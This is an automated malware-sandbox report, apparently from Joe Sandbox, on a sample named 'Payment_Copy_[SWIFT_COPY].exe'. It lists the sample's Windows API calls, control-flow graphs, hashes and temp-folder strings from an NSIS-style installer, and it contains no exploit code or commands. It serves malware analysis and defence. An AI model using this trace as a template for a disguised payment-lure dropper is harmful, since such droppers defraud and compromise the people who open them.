                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                        • String ID: %s%s.dll$UXTHEME$\
                                                                                                                        • API String ID: 2200240437-4240819195
                                                                                                                        • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                                                                                        • Instruction ID: fa246daef39c5d1266dc05b53ca8af7bf1dea281c1fa5b10d5a6498bb1fbd0ec
                                                                                                                        • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                                                                                        • Instruction Fuzzy Hash: AAF0F63094050A6BDB14AB64DC0DFFB365CFB08305F1404BAB646E20C2E678E9158FAD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 585 4058cd-4058d7 586 4058d8-405902 GetTickCount GetTempFileNameA 585->586 587 405911-405913 586->587 588 405904-405906 586->588 590 40590b-40590e 587->590 588->586 589 405908 588->589 589->590
                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 004058E0
                                                                                                                        • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058FA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountFileNameTempTick
                                                                                                                        • String ID: "C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                        • API String ID: 1716503409-1022902909
                                                                                                                        • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                                                        • Instruction ID: 53182d5486abb24f79a58d6e85a6b3ecacc509e50e1b88e8db4ee69f85448782
                                                                                                                        • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                                                        • Instruction Fuzzy Hash: E8F0A736348258BBD7115E56DC04B9F7F99DFD1760F10C027FA049A280D6B09A54C7A9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 591 4015b3-4015c6 call 402a29 call 40574e 596 4015c8-4015db call 4056e5 591->596 597 40161c-40161f 591->597 605 4015f3-4015f4 call 4053f2 596->605 606 4015dd-4015e0 596->606 599 401621-40163c call 401423 call 405bc7 SetCurrentDirectoryA 597->599 600 40164a-40219c call 401423 597->600 612 4028be-4028cd 599->612 616 401642-401645 599->616 600->612 613 4015f9-4015fb 605->613 606->605 610 4015e2-4015e9 call 40540f 606->610 610->605 621 4015eb-4015ec call 405375 610->621 618 401612-40161a 613->618 619 4015fd-401602 613->619 616->612 618->596 618->597 623 401604-40160d GetFileAttributesA 619->623 624 40160f 619->624 626 4015f1 621->626 623->618 623->624 624->618 626->613
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0040574E: CharNextA.USER32(00405500,?,C:\,00000000,004057B2,C:\,C:\,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040575C
                                                                                                                          • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405761
                                                                                                                          • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405770
                                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                                                          • Part of subcall function 00405375: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                        • API String ID: 1892508949-3707357800
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph of function 40579b (legend: Executed / Not Executed)
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00405BC7: lstrcpynA.KERNEL32(?,?,00000400,004031D8,pkfcbfzkpkrqtkjcmcyn Setup,NSIS Error), ref: 00405BD4
                                                                                                                          • Part of subcall function 0040574E: CharNextA.USER32(00405500,?,C:\,00000000,004057B2,C:\,C:\,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040575C
                                                                                                                          • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405761
                                                                                                                          • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405770
                                                                                                                        • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004057EE
                                                                                                                        • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004057FE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                        • String ID: C:\
                                                                                                                        • API String ID: 3248276644-3404278061
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph of function 401389 (legend: Executed / Not Executed)
                                                                                                                        APIs
                                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                        • SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: e_
                                                                                                                        • API String ID: 3850602802-124733211
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph of function 405427 (legend: Executed / Not Executed)
                                                                                                                        APIs
                                                                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042C0A8,Error launching installer), ref: 0040544C
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00405459
                                                                                                                        Strings
                                                                                                                        • Error launching installer, xrefs: 0040543A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                                        • String ID: Error launching installer
                                                                                                                        • API String ID: 3712363035-66219284
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041BA19,755723A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                                                          • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041BA19,755723A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                                                          • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041BA19,755723A0), ref: 00404F0F
                                                                                                                          • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                                                          • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                                                          • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                                                          • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                                                          • Part of subcall function 00405427: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042C0A8,Error launching installer), ref: 0040544C
                                                                                                                          • Part of subcall function 00405427: CloseHandle.KERNEL32(?), ref: 00405459
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E72
                                                                                                                        • GetExitCodeProcess.KERNELBASE(?,?), ref: 00401E82
                                                                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3521207402-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                                                          • Part of subcall function 00405EE9: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F00
                                                                                                                          • Part of subcall function 00405EE9: wsprintfA.USER32 ref: 00405F39
                                                                                                                          • Part of subcall function 00405EE9: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2547128583-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe,80000000,00000003), ref: 004058A2
                                                                                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesCreate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 415043291-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00403366,00000020), ref: 0040354B
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\nsb8D54.tmp\, xrefs: 0040355F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsb8D54.tmp\
                                                                                                                        • API String ID: 2962429428-2096784298
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetFileAttributesA.KERNELBASE(?,0040568A,?,?,?), ref: 00405883
                                                                                                                        • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405895
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,0040311D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004053F8
                                                                                                                        • GetLastError.KERNEL32 ref: 00405406
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1375471231-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EDD,000000FF,00000004,00000000,00000000,00000000), ref: 004030C7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,000089E4), ref: 004030F0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 973152223-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,00000403), ref: 00405050
                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040505F
                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040509C
                                                                                                                        • GetSystemMetrics.USER32(00000015), ref: 004050A4
                                                                                                                        • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004050C5
                                                                                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050D6
                                                                                                                        • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050E9
                                                                                                                        • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050F7
                                                                                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040510A
                                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040512C
                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405140
                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405161
                                                                                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405171
                                                                                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040518A
                                                                                                                        • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405196
                                                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 0040506E
                                                                                                                          • Part of subcall function 00403EB8: SendMessageA.USER32(00000028,?,00000001,00403CE9), ref: 00403EC6
                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004051B3
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00004F85,00000000), ref: 004051C1
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004051C8
                                                                                                                        • ShowWindow.USER32(00000000), ref: 004051EC
                                                                                                                        • ShowWindow.USER32(00000000,00000008), ref: 004051F1
                                                                                                                        • ShowWindow.USER32(00000008), ref: 00405238
                                                                                                                        • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 0040526A
                                                                                                                        • CreatePopupMenu.USER32 ref: 0040527B
                                                                                                                        • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405290
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004052A3
                                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052C7
                                                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405302
                                                                                                                        • OpenClipboard.USER32(00000000), ref: 00405312
                                                                                                                        • EmptyClipboard.USER32 ref: 00405318
                                                                                                                        • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405321
                                                                                                                        • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040532B
                                                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040533F
                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405357
                                                                                                                        • SetClipboardData.USER32(00000001,00000000), ref: 00405362
                                                                                                                        • CloseClipboard.USER32 ref: 00405368
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
